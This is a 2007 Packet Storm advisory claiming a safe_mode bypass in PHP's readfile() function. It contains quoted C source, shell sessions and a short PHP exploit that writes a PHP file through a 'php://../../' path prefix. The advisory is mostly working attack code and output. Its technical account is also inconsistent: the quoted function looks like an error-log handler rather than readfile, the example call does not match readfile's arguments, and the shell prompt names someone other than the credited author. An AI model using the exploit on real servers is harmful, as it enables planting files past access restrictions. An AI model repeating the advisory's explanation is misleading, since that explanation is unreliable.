php-readfile.txt

2007-03-27T00:00:00
ID PACKETSTORM:55385
Type packetstorm
Reporter ThE-WolF-ksA
Modified 2007-03-27T00:00:00

Description

                                        
                                            `SecurityRisk : DEN  
Remote Exploit : No  
Local Exploit : Yes  
Exploit Given : Yes  
Credit : The-WolF-kSA  
Date : 24.3.2007  
  
  
Affected Software : PHP 5.2.1/ 5.1.6 / 4.4.4  
  
  
[readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4]  
  
Author: ThE-WoLf-KsA)  
Date:  
- -Written: 24.3.2007  
  
  
- --- 0.Description ---  
  
  
- --- 1. readfile() Safe Mode Bypass ---  
readfile() function read throu, file or display your file or path. You can  
read into  
files. Issue is very simple. readfile() check safe_mode and  
open_basedir in stream function. But isn't allowed use URL. And  
problem exists in incorrect filename.  
  
PHP5:  
- -2013-2050---  
PHPAPI int _php_readfile(int opt_err, char *message, char *opt,  
char *headers TSRMLS_DC)  
{  
php_stream *stream = NULL;  
  
switch (opt_err) {  
  
case 1: /*send an email */  
{  
#if HAVE_SENDMAIL  
if (!php_mail(opt, "PHP error_log message",  
message, headers, NULL TSRMLS_CC)) {  
return FAILURE;  
}  
#else  
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option  
not available!");  
return FAILURE;  
#endif  
}  
break;  
  
case 2: /*send to an address */  
php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP  
option not available!");  
return FAILURE;  
break;  
  
case 3: /*save to a file */  
stream = php_stream_open_wrapper(opt, "a",  
IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);  
if (!stream)  
return FAILURE;  
php_stream_write(stream, message, strlen(message));  
php_stream_close(stream);  
break;  
  
default:  
php_log_err(message TSRMLS_CC);  
break;  
}  
return SUCCESS;  
}  
- -2013-2050---  
  
Let's see to option 3.  
  
- -2038 line---  
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL |  
ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);  
- -2038 line---  
  
Option "a", writte to file error or if file dosen't  
exists, create new file.  
Problem is because in php_stream_open_wrapper(), is defined  
"IGNORE_URL".  
IGNORE_URL turn off safe_mode if you use  
"prefix://../../".  
  
- -Example---  
cxib# php -r 'readfile("<? echo \"cx\";  
?>", 3, "/www/temp/sr.php");'  
  
Warning: readfile(): SAFE MODE Restriction in effect. The  
script whose uid is 0 is not allowed to access /www/temp owned by  
uid 80 in Command line code on line 1  
  
Warning: readfile(/www/temp/sr.php): failed to open stream:  
Invalid argument in Command line code on line 1  
cxib# php -r 'readfile("<? echo \"cx\";  
?>", 3, "php://../../www/temp/sr.php");'  
cxib# ls -la /www/temp/sr.php  
- -rw-r--r-- 1 cxib www 16 Jun 11 17:47 /www/temp/sr.php  
cxib#  
- -Example---  
  
- --- 2. Exploit ---  
<?php  
$file=""; # FILENAME  
readfile("<? echo \"cx\"; ?>", 3,  
"php://../../".$file);  
?>  
  
  
  
- --- 4. Greets ---  
SniPer_hex  
  
- --- 5. Contact ---  
ThE-WolF-ksA@hotmail.com  
  
`